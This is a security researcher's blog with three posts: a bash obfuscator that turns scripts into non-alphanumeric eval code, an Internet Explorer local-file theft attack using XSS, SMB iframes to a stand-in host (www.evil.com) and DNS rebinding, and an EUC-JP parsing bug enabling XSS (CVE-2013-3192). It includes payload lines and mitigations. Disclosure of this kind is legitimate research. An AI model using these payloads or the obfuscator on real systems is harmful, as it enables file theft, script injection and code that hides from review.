Tuesday, November 12, 2013

Non Alpha Numeric Shellscript


Making your shell script non alpha numeric


Ever had the need to obfuscate your complete shellscript by using non alpha numeric code? Now there is a tool for that ;) 

I already wrote some time ago about how to start writing non alpha numeric shellscript, but this would not support shell internals like if statements etc. But some days ago I found out that there exists an eval in bash, which makes it possible to support shell internals.

The basic steps my script does are the following:
1. Get via Regex enough characters to build echo -e \0
2. Increase a counter
3. Concat the counter with echo -e \0 to create needed characters
4. Step 3 is repeated to get every character. 
5. create eval
6. concat all characters and pass them to eval

Take this shellscript as an example:
____________________________________________________________________

echo "Enter the password: ";
read test;
if [ $test == "correct" ]; then echo "You cracked it;)"; else echo "HAHA, wrong!"; fi

After processing it, it will look like this (abbreviated)



/????\+?????
__=$_
. .
___=$?
____=___
____=$[++____]
____=$[++____]
____=$[++____]
_____=${__:____:___}
_______=${__:___+___:___}
__=/?${_____}?
$__
__=$_
______=${__:___:___}
________=${__:___+___+___:___}
__=/?${_______}?${______}
$__
__=$_
_________=${__:___:___}
__________=${______}${________}${_________}${_______}" -"${______}" "\\$[___-___] ___=$[++___]
[..]
___=$[++___]
___________=${__________}$___;___________=$($___________)
___=$[++___]
____________=${__________}$___;____________=$($____________)
___=$[++___]
_____________=${__________}$___;_____________=$($_____________)
___=$[++___]
___=$[++___]
______________=${__________}$___;______________=$($______________)
___=$[++___]
[..]
___=$[++___]
_______________=${__________}$___;_______________=$($_______________)
___=$[++___]
___=$[++___]
___=$[++___]
________________=${__________}$___;________________=$($________________)
___=$[++___]
___=$[++___]
___=$[++___]
[..]
___=$[++___]
___=$[++___]
_________________=${__________}$___;_________________=$($_________________)
___=$[++___]
__________________=${__________}$___;__________________=$($__________________)
___=$[++___]
___=$[++___]
___________________=${__________}$___;___________________=$($___________________)
___=$[++___]
[..]
___=$[++___]
____________________=${__________}$___;____________________=$($____________________)
___=$[++___]
___=$[++___]
___=$[++___]
___=$[++___]
_____________________=${__________}$___;_____________________=$($_____________________)
___=$[++___]
___=$[++___]
___=$[++___]
___=$[++___]
___=$[++___]
______________________=${__________}$___;______________________=$($______________________)
___=$[++___]
___=$[++___]
[..]
___=$[++___]
___=$[++___]
_______________________=${__________}$___;_______________________=$($_______________________)
___=$[++___]
___=$[++___]
________________________=${__________}$___;________________________=$($________________________)
___=$[++___]
_________________________=${__________}$___;_________________________=$($_________________________)
___=$[++___]
__________________________=${__________}$___;__________________________=$($__________________________)
___=$[++___]
___=$[++___]
___=$[++___]
___=$[++___]
___=$[++___]
___=$[++___]
___________________________=${__________}$___;___________________________=$($___________________________)
___=$[++___]
___=$[++___]
____________________________=${__________}$___;____________________________=$($____________________________)
___=$[++___]
_____________________________=${__________}$___;_____________________________=$($_____________________________)
___=$[++___]
______________________________=${__________}$___;______________________________=$($______________________________)
___=$[++___]
_______________________________=${__________}$___;_______________________________=$($_______________________________)
___=$[++___]
________________________________=${__________}$___;________________________________=$($________________________________)
___=$[++___]
___=$[++___]
___=$[++___]
_________________________________=${__________}$___;_________________________________=$($_________________________________)
___=$[++___]
__________________________________=${__________}$___;__________________________________=$($__________________________________)
___=$[++___]
___=$[++___]
___________________________________=${__________}$___;___________________________________=$($___________________________________)
___=$[++___]
____________________________________=${__________}$___;____________________________________=$($____________________________________)
___=$[++___]
___=$[++___]
_____________________________________=${__________}$___;_____________________________________=$($_____________________________________)
___=$[++___]
______________________________________=${__________}$___;______________________________________=$($______________________________________)
___=$[++___]
___=$[++___]
___=$[++___]
_______________________________________=${__________}$___;_______________________________________=$($_______________________________________)
___=$[++___]
___=$[++___]
________________________________________=${__________}$___;________________________________________=$($________________________________________)
___=$[++___]
_________________________________________=${__________}$___;_________________________________________=$($_________________________________________)
___=$[++___]
__________________________________________=${__________}$___;__________________________________________=$($__________________________________________)
___=$[++___]
___________________________________________=${__________}$___;___________________________________________=$($___________________________________________)
___=$[++___]
____________________________________________=${__________}$___;____________________________________________=$($____________________________________________)
___=$[++___]
_____________________________________________=${__________}$___;_____________________________________________=$($_____________________________________________)
$______________________________$____________________________________________$___________________________$____________________________________ $($__________ $______________________________$____________________________$_________________________________$______________________________________$___________$_____________$_____________________$_____________________________________$__________________________________________$______________________________$________________________________________$___________$__________________________________________$_________________________________$______________________________$___________$_______________________________________$___________________________$_________________________________________$_________________________________________$_____________________________________________$______________________________________$________________________________________$_____________________________$_________________$___________$_____________$__________________$_________________________$_____________________________________$________________________________________$______________________________$___________________________$_____________________________$___________$__________________________________________$______________________________$_________________________________________$__________________________________________$__________________$_________________________$_____________________________________$__________________________________$_______________________________$___________$________________________$___________$______________$__________________________________________$______________________________$_________________________________________$__________________________________________$___________$___________________$___________________$___________$_____________$____________________________$______________________________________$________________________________________$________________________________________$______________________________$____________________________$__________________________________________$_____________$___________$__________________________$__________________$___________$__________________________________________$_________________________________$______________________________$_____________________________________$___________$______________________________$____________________________$_________________________________$______________________________________$___________$_____________$_______________________$______________________________________$___________________________________________$___________$____________________________$________________________________________$___________________________$____________________________$___________________________________$______________________________$_____________________________$___________$__________________________________$__________________________________________$__________________$_______________$_____________$__________________$___________$______________________________$____________________________________$_________________________________________$______________________________$___________$______________________________$____________________________$_________________________________$______________________________________$___________$_____________$______________________$____________________$______________________$____________________$________________$___________$_____________________________________________$________________________________________$______________________________________$_____________________________________$________________________________$____________$_____________$__________________$___________$_______________________________$__________________________________$_________________________$_____________________________________)



The usage is very simple:
python obfuscate.py <pathtoshellscript>

It will create a new file called nonalpha.sh
If you want to play around with it, get it here:

https://drive.google.com/open?id=1TTbgZ5zy5ykg-VxUmPl_HiBaj2tpaEN5











Friday, September 27, 2013

IE Intranet Zone - stealing local files



The idea to create this attack came to my mind, when I figured out that the Intranet Zone is allowed to iframe local files via UNC Syntax:

\\127.0.0.1\C$\localfile

If we know the location of a file, it could be possible to read it.

So lets start:


Getting into the Intranet Zone


!To be clear, the Intranet Zone only exists if your workstation is in a domain. That's why this attack only works in a corporate network.

The idea for this was taken from here click. Basically you can misuse websites, hosted on Top Level Domains, to achieve the effect of an Intranet Zone. There are websites on io or uz.
Misuse means we need to find a XSS hole in the site (which is not the problem ;). A second option is to buy a TLD, which costs 185 000$, so I sticked to XSS.
Additionally you have to remember, that Internet Explorer has a built in reflected XSS filter. Because I did not want to stop creating this attack because of a XSS filter, I tried to bypass it. I succeeded, but I am not going to publish the bypass until its fixed.
So by combining a XSS vulnerability and a website hosted on a TLD, I achieved intranet privileges. The next step introduces SMB.

!Important side notes:
Websites on a TLD will be forbidden:
http://www.icann.org/en/news/announcements/announcement-30aug13-en.htm


A website on a TLD is only resolvable in a corporate network, if the windows server is not the one resolving it. Windows DNS Server does not resolve A entries for TLD, the reason for this behavior is described here.

Additionally, do not iframe the intranet zone. If the victim visits your site like www.example.com, you must not load e.g. http://io in an iframe, use a popunder instead. If you iframe it, the attack will fail, because www.example.com (internet zone) has protected mode by default enabled and by iframing you apply protected mode to the intranet (even if it has protected mode disabled).


Next step: SMB

After getting script execution inside the intranet zone, all I have to do is load a html file from a smb share. 

The syntax to load a smb share is the following: \\<server>\<share>\<path>
So lets do this:
<iframe src=\\www.evil.com\C$\index.html></iframe>

This loads a file on a smb share, controlled by me. To be able to do this, the client needs to be allowed to create connections to port 445 in the internet.
The share needs to be named C$, because Internet Explorer uses the server name+share as the host to enforce the same origin policy. We will see later on why this is important.

DNS Rebinding is such a nice thing

The index.html is loaded and ready to attack. All it wants to do is loading an iframe:
<iframe src=\\www.evil.com\C$\Users\hans\Desktop\steal.txt></iframe>

But this time I do not want www.evil.com to point to a server in the internet, I want access to the local machine. To achieve this I am using DNS Rebinding. Normally DNS Rebinding is used to attack servers/routers in the LAN, by mapping the same domain name to a local ip address. I use it a little bit different:

After the index.html gets loaded, the firewall @www.evil.com blocks all TCP connections. Additionally the record for www.evil.com is changed from A 1.2.3.4 to CNAME localhost record.
If index.html now loads the iframe, which points to www.evil.com, the browser reuses the saved IP, and tries to connect to 1.2.3.4. Because all TCP connections are blocked, the browser drops the saved IP and initiate a new DNS request for www.evil.com. This behavior is called Anti-DNS Pinning.
The DNS server now response with the CNAME entry to localhost.
Now www.evil.com got rebinded to localhost, which is why the iframe now connects to the locale smb share C$ to load the path Users\hans\Desktop\steal.txt

To finish index.html can access the innerHTML of the loaded iframe, because the SOP is fulfilled.
The hostname is the same (www.evil.com) and the share name too (C$). Now it should be clear, why you must use C$ as the share name. After getting the innerHTML (the content of the file) it is really easy to send it via javascript to the attacker.

If you are familiar with DNS Rebinding you maybe wondering why I use a CNAME record instead of returning 127.0.0.1 for www.evil.com. The reason is, that it only works with the CNAME entry ;)
I think IE uses the hostname+username to connect to smb shares and hans@www.evil.com is not a valid user, but hans@localhost is.
One could ask me how I know the username in the path. I do not have to guess it, it gets transmitted in the SMB connection while loading the index.html file.

Protection & Improvements

To protect yourself you can either forbid port 445 to the internet (which you really should!!), or use the windows server as your main DNS server.
But the easiest way to protect you, is to enable protected mode for the intranet zone.
If you do not block port 445, I should mention the information posted here. The same thing happens during this attack, while loading the index.html from www.evil.com.

The improvements: I tried to implement this attack by using WebDav(Port 80). It uses the exact same syntax as SMB shares, so the SOP would make no problem. But if the index.html gets loaded via WebDav, the access to local files fails. It could be that IE is "smart" and uses the same port again, which means it tries to connect to localhost\C$ via WebDav too. I am still working on this issue.

Heres a Poc Video. You see that load.com loads a intranet side (the popunder does not work for me :(   ), which alerts the content of the local file. It takes so long, because the  is far frome being optimized.


See the PoC here

Thats it for you, the next attack will follow soon :)

















Friday, August 16, 2013

UXSS – Internet Explorer EUC-JP Parsing Bug


While I was using shazzer, one vector had a really weird result.

The vector was: <img src=x *chr*> onerror=alert(1)>;

The result said that in Internet Explorer 10, a certain character in the euc-jp charset consumed the >, which lead to the execution of the onerror event handler but viewing the test case resulted in no code execution.

After retesting the vector, there were either no results or different characters got detected, but still no test case worked.
I assumed that shazzer worked correctly, but certain parameters were different between show test case and the real fuzzing process.

After creating a little fuzzing script, I finally found out that a certain amount of characters have to be before the starter byte 0x8F. The document has to look like this (charset must be euc-jp):

4094 Bytes + 0x8F + characters that “disappears”. (4094+1 = 0xfff)

After knowing how to trigger the bug, I found out that not only > gets consumed, it seems like every char gets consumed. This is especially usefully to consume the “.

A vector could look like this: [4076*A]<img src="x" alt="[0x8F]" test=" onerror=alert(1)//">
Because the " will be consumed, the onerror event will execute.

This parsing bug enables XSS on websites, which use the euc-jp charset, to attack Internet Explorer users even when the site has no XSS vulnerability.

Reported: 27.5.2013
Fixed: 14.8.2013
CVE-2013-3192